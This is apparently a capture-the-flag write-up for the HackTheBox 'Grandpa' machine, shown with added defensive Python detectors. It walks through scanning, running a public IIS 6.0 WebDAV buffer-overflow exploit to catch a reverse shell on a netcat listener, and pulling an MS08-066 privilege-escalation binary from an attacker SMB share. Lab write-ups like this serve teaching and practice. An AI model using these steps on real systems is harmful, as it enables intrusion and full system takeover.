HackTheBox: Grandpa & Granny

The first step was to run an Nmap scan to discover services running on the machine:

# Nmap 7.80 scan initiated Thu Nov 12 14:33:08 2020 as: nmap -sV -sC -O -p1-2056 -oN scan 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up (0.014s latency).
Not shown: 2055 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Server Date: Thu, 12 Nov 2020 19:36:15 GMT
|_  Server Type: Microsoft-IIS/6.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (91%), Microsoft Windows Server 2008 Enterprise SP2 (91%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP SP3 (89%), Microsoft Windows 2003 SP2 (88%), Microsoft Windows 2000 SP4 (86%), Microsoft Windows XP (86%), Microsoft Windows Server 2003 SP1 - SP2 (85%), Microsoft Windows XP SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 12 14:33:28 2020 -- 1 IP address (1 host up) scanned in 19.20 seconds

 

From the output we can see that IIS 6.0 is running with WebDAV. I then used searchsploit to search for exploits for IIS 6.0:

┌──(root💀kali)-[/home/kali]
└─# searchsploit iis 6.0
--------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                         |  Path
--------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure       | windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow                | windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service                  | windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service                           | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow               | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                            | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                            | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                        | windows/remote/8754.patch
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                          | windows/remote/8765.php
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                               | windows/remote/19033.txt
--------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
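
Looking back at the Nmap report at the top of the page from the defender's side, the following added example (not part of the original write-up) turns `http-webdav-scan` output into an exposure finding per host and port. The function name, the list of write-capable methods and the `legacy_iis` flag are assumptions of the example; the sample lines are copied from the scan above.

```python
import re

# Methods that modify content or locks; this risk list is an assumption of the example.
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}

# Lines copied from the scan report above, trimmed to the fields the audit reads.
SAMPLE_REPORT = """\
Nmap scan report for 10.10.10.14
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_  Server Type: Microsoft-IIS/6.0
"""

def audit_webdav(report):
    """Return one finding per open port whose http-webdav-scan lists methods."""
    findings, host, svc = [], None, None
    for line in report.splitlines():
        if m := re.match(r"Nmap scan report for (\S+)", line):
            host, svc = m.group(1), None
        elif m := re.match(r"(\d+)/tcp\s+open\s+\S+\s*(.*)", line):
            svc = {"host": host, "port": int(m.group(1)), "server": m.group(2).strip(),
                   "public": set(), "allowed": set()}
        elif svc and (m := re.match(r"\|[ _]+(Public Options|Allowed Methods): (.*)", line)):
            key = "public" if m.group(1) == "Public Options" else "allowed"
            svc[key] = {name.strip() for name in m.group(2).split(",")}
            if svc not in findings:
                findings.append(svc)
    for f in findings:
        # Write-capable methods the scanned URL actually permits.
        f["writable"] = sorted(f["allowed"] & WRITE_METHODS)
        # Advertised under Public Options but absent from Allowed Methods.
        f["advertised_only"] = sorted((f["public"] - f["allowed"]) & WRITE_METHODS)
        # IIS 6.0 ships with Windows Server 2003, which is out of support.
        f["legacy_iis"] = "IIS httpd 6.0" in f["server"]
    return findings

if __name__ == "__main__":
    for f in audit_webdav(SAMPLE_REPORT):
        print(f["host"], f["port"], f["server"], "(legacy)" if f["legacy_iis"] else "")
        print("  write-capable methods allowed:", ", ".join(f["writable"]) or "none")
        print("  advertised but not allowed:   ", ", ".join(f["advertised_only"]) or "none")
```
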

After trying several of the exploits searchsploit found, I was able to use the one based on the ScStoragePathFromUrl remote buffer overflow, found HERE.

I created a netcat listener on port 2600, downloaded the Python script and ran it with the necessary arguments.

root@kali:/home/kali/Documents/grandpa# python test.py 10.10.10.14 80 10.10.14.15 2600
Traceback (most recent call last):
  File "test.py", line 124, in <module>
    sock.connect((targetip,targetport))
  File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
socket.error: [Errno 110] Connection timed out
root@kali:/home/kali/Documents/grandpa# python test.py 10.10.10.14 80 10.10.14.15 2600
PROPFIND / HTTP/1.1
Host: localhost
Content-Length: 1744
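
For the detection side of the PROPFIND request printed above, the following added example (not part of the original write-up or of the exploit script) flags WebDAV requests whose `If` header is abnormally long or carries raw non-ASCII bytes. The thresholds, function names and both sample requests are assumptions of the example; the samples are constructed and contain only harmless filler.

```python
import re

WEBDAV_METHODS = {b"PROPFIND", b"PROPPATCH", b"LOCK", b"UNLOCK",
                  b"COPY", b"MOVE", b"MKCOL", b"PUT", b"DELETE"}
MAX_IF_BYTES = 512        # assumed ceiling for a legitimate If header
MAX_RESOURCE_TAG = 256    # assumed ceiling for one <http://...> resource tag

def parse_head(raw):
    """Split a raw request into (method, {lowercased header name: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
    method = head[0].split(b" ", 1)[0].upper()
    headers = {}
    for line in head[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers

def inspect_request(raw):
    """Return anomaly codes for the If header of a WebDAV request (empty = clean)."""
    method, headers = parse_head(raw)
    if_header = headers.get(b"if")
    if method not in WEBDAV_METHODS or if_header is None:
        return []
    findings = []
    if len(if_header) > MAX_IF_BYTES:
        findings.append("if-header-oversized")
    # Resource tags are URIs and should be printable ASCII; control or high
    # bytes mean unencoded binary data was placed in the header.
    if any(b < 0x20 or b > 0x7E for b in if_header):
        findings.append("if-header-non-ascii")
    tags = re.findall(rb"<(https?://[^>]*)>", if_header)
    if any(len(t) > MAX_RESOURCE_TAG for t in tags):
        findings.append("if-resource-tag-oversized")
    return findings

# Constructed samples: a normal lock-token condition, and a header inflated
# with harmless multi-byte filler (no payload).
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: files.example\r\nDepth: 1\r\n"
          b"If: <http://files.example/docs/a.doc> (<opaquelocktoken:constructed-token>)\r\n"
          b"Content-Length: 0\r\n\r\n")
FILLER = "\u4e00".encode("utf-8") * 300
SUSPECT = (b"PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n"
           b"If: <http://localhost/aaaaaaa" + FILLER + b"> (Not <locktoken:write1>)\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect_request(req) or "clean")
```
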



┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600
listening on [any] 2600 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>

As you can see from the output, the shell was successfully captured by the netcat listener. I then moved on to privilege escalation. I ran systeminfo to get some details of the Grandpa machine. From the output I was able to determine that it was running Server 2003 with only 1 hotfix. Because of this, I decided to try using the MS08-066 exploit, as I had luck with it in the past. I downloaded the exploit from GITHUB and copied it to the machine using SMB.

C:\wmpub>copy \\10.10.14.18\testshare\ms08066.exe
copy \\10.10.14.18\testshare\ms08066.exe
        1 file(s) copied.

I then ran the exploit.

C:\wmpub>ms08066.exe
ms08066.exe

 MS08-0xx Windows Kernel Ancillary Function Driver Local Privilege Escalation Vulnerability Exploit 

         Create by SoBeIt. 

Kernel is \WINDOWS\system32\ntkrnlpa.exe
Kernel base address: 80800000
Major Version:5 Minor Version:2
Load Base:410000
HalDispatchTable Offset:8088e078
NtQueryIntervalProfile function entry address:8088e07c
Exploit finished.

C:\wmpub>cd c:\
cd c:\

C:\>cd documents and settings
cd documents and settings

C:\Documents and Settings>cd Harry
cd Harry

C:\Documents and Settings\Harry>cd Desktop
cd Desktop

C:\Documents and Settings\Harry\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Harry\Desktop

04/12/2017  04:32 PM    <DIR>          .
04/12/2017  04:32 PM    <DIR>          ..
04/12/2017  04:32 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,123,960,320 bytes free

C:\Documents and Settings\Harry\Desktop>type user.txt
type user.txt
[REDACTED]

C:\Documents and Settings\Harry\Desktop>cd ..
cd ..

C:\Documents and Settings\Harry>cd ..
cd ..

C:\Documents and Settings>cd Administrator
cd Administrator

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
[REDACTED]

As you can see from the output, I was able to successfully browse to the Administrator and Harry folders as the SYSTEM user and capture both flags.
